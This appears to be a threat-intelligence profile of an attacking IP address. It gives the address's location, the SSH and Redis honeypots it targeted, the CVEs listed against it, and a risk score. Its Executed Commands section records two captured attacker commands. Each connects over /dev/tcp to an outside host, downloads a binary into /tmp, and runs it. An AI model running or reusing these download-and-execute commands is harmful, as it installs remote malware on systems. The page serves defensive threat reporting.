TROYANOSYVIRUS
Active Threat (MEDIUM)

8.130.169.123

Country of Origin: 🇨🇳 China
First Detection: 3/18/2026
Last Activity: 3/19/2026
ISP: Hangzhou Alibaba Advertising Co.,Ltd.

Total Attacks: 50
Ports: 2
Attack Types: 2
Malware: 3

Geolocation

Country: 🇨🇳 China
City: Beijing
ASN: AS37963
ISP: Hangzhou Alibaba Advertising Co.,Ltd.

Attack Types

ssh_telnet_honeypot
redis_honeypot

Attacked Ports

22, 6379

Associated Malware

Executed Commands

$ nohup bash -c "exec 6<>/dev/tcp/203.57.109.214/60114 && echo -n 'GET /linux' >&6 && cat 0<&6 > /tmp/Dn9iNVGCNq && chmod +x /tmp/Dn9iNVGCNq && /tmp/Dn9iNVGCNq E7T8mTOH+6Nwb6T3hzKY+q5obqX/nSCR4KVtbrr/nzmH/6ZtZKL+mDSZ7qZubbr7ni6Y/q1wbKX6kzaZ/6Vqw+6q0SZ4ZHqdr6Y=" &   (1x)
$ nohup bash -c "exec 6<>/dev/tcp/203.57.109.214/60114 && echo -n 'GET /linux' >&6 && cat 0<&6 > /tmp/UtGVTF1hq3 && chmod +x /tmp/UtGVTF1hq3 && /tmp/UtGVTF1hq3 I4iGD3y5ongRhZhXQJqFC3Whp34OgIhWQJmHD2GmoXYRhZpdVJ6EDnunt30Ph4ZbWYaFD3a5pX4Ljp5eX5mA6bUXrLt34PSTox2HlJg=" &   (1x)

Shodan InternetDB Exposure

InternetDB data, not real-time

Ports: 22, 3306
Vulnerabilities: CVE-2018-15919, CVE-2025-32728, CVE-2018-20685, CVE-2017-15906, CVE-2021-41617, CVE-2018-15473, CVE-2016-20012, CVE-2025-26465, CVE-2023-38408, CVE-2021-36368, CVE-2019-6109, CVE-2007-2768, CVE-2019-6110, CVE-2020-14145, CVE-2019-6111, CVE-2020-15778, CVE-2023-51767, CVE-2023-51385, CVE-2008-3844, CVE-2023-48795
CPEs: cpe:/a:oracle:mysql:5.7.44, cpe:/a:openbsd:openssh:7.4

Risk Assessment

45/100
Scale: Low, Medium, High, Critical